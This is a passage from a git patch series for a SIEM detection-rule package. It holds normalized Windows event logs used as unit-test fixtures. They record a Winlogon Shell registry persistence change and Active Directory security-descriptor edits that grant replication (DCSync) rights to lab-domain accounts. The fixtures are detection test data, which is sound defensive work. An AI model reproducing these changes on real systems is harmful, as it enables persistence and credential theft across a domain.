"Create_persist_via_WinlogonShell", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_WinlogonShell|win10-work.stand2008.local|reg.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "c:\\windows\\system32\\cmd.exe, explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon", "object.property": "value", "object.value": "-", "status": "success", "subject": "process", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "2551176", "subject.process.fullpath": "C:\\Windows\\System32\\reg.exe", "subject.process.name": "reg.exe", "subject.process.path": "C:\\Windows\\System32\\"} From 40d52d9b1c82dc95844ce5a509016455433e71db Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:15:36 +0300 Subject: [PATCH 43/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(DCSync?= =?UTF-8?q?=5Fprepare=5FAdd=5Freplicatation=5Frights=5Fto=5FAccount)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tests/test_1.sc | 5 +++++ .../tests/test_2.sc | 5 +++++ 2 files changed, 10 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc new file mode 100644 index 00000000..d81faf71 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc @@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0236298Z\"},\"EventRecordID\":\"198242592\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"896\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{57dccd4c-7381-4371-8480-d74d47019ad8}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14675\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{57dccd4c-7381-4371-8480-d74d47019ad8}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value deleted", "object.type": "domainDNS", "object.value": "O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T16:37:41.039Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-25T21:28:45.023Z", "type": "raw", "uuid": "10cb824f-e4df-48fd-8670-c129cae5e9a8"} +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0236298Z\"},\"EventRecordID\":\"198242593\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"2868\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{57dccd4c-7381-4371-8480-d74d47019ad8}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14674\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{57dccd4c-7381-4371-8480-d74d47019ad8}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": "domainDNS", "object.value": "O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff